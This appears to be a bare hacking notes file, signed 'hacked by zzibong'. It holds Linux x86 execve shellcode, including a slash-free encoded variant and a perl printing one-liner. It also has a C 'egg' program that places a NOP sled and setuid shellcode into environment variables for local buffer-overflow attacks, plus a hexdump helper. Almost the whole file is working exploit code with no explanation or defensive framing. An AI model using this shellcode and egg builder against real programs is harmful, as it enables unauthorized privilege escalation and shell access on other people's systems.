hacked by zzibong

// 25byte shellcode
`perl -e 'print "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`

// /(%2f) 없는 shellcode
\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90

char shellcode[] =
"\x31\xc0\xb0\xc9\xcd\x80\x89\xc2\x31\xc0\xb0\x46\x31\xdb\x89\xd3\x31\xc9\x66\x89\xd9\xcd\x80\xeb\x50\x5e\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xb0\x04\xb3\x01\x89\xf1\xb2\x30\xcd\x80\x83\x06\x05\x83\x46\x01\x20\x83\x46\x02\x17\x83\x46\x03\x2d\x83\x6e\x04\x27\x83\x46\x05\x24\x83\x46\x06\x47\x83\x6e\x07\x21\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xab\xff\xff\xff\x2a\x42\x52\x41\x56\x4f\x21\x21\x20\x63\x6f\x6e\x67\x72\x61\x74\x75\x6c\x61\x74\x69\x6f\x6e\x7e\x2a\x0a\x2a\x68\x74\x74\x70\x3a\x2f\x2f\x62\x6c\x75\x65\x68\x34\x67\x2e\x6f\x72\x67\x2a\x0a";

unsigned long get_esp(void)
{
   __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
   char *buff, *ptr, *egg;
   long *addr_ptr, addr;
   int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
   int i, eggsize=DEFAULT_EGG_SIZE;

   if (argc > 1) bsize = atoi(argv[1]);
   if (argc > 2) offset = atoi(argv[2]);
   if (argc > 3) eggsize = atoi(argv[3]);

   if (!(buff = malloc(bsize))) {
     printf("Can't allocate memory.\n");
     exit(0);
   }

   if (!(egg = malloc(eggsize))) {
     printf("Can't allocate memory.\n");
     exit(0);
   }

   addr = get_esp() - offset;

   printf("Using address: 0x%x\n", addr);

   ptr = buff;
   addr_ptr = (long *) ptr;
   for (i = 0; i < bsize; i+=4)
     *(addr_ptr++) = addr;

   ptr = egg;
   for(i = 0; i < eggsize - strlen(shellcode) - 1; i++)
     *(ptr++) = NOP;
   for(i = 0; i < strlen(shellcode); i++)
     *(ptr++) = shellcode[i];

   buff[bsize - 1] = '\0';
   egg[eggsize - 1] = '\0';
   memcpy(egg,"EGG=",4);
   putenv(egg);
   memcpy(buff,"RET=",4);
   putenv(buff);
   system("/bin/bash");
}

void printchar(unsigned char c)
{
 if(isprint(c))
  printf("%c",c);
 else
  printf(".");
}
void dumpcode(unsigned char *buff, int len)
{
 int i;
 for(i=0;i<len;i++)
 {
  if(i%16==0)
   printf("0x%08x  ",&buff[i]);
                printf("%02x ",buff[i]);
  if(i%16-15==0)
  {
   int j;
   printf("  ");
   for(j=i-15;j<=i;j++)
    printchar(buff[j]);
   printf("\n");
  }
 }
 if(i%16!=0)
 {
  int j;
  int spaces=(len-i+16-i%16)*3+2;
  for(j=0;j<spaces;j++)
   printf(" ");
  for(j=i-i%16;j<len;j++)
   printchar(buff[j]);
 }
 printf("\n");
}

webhacking...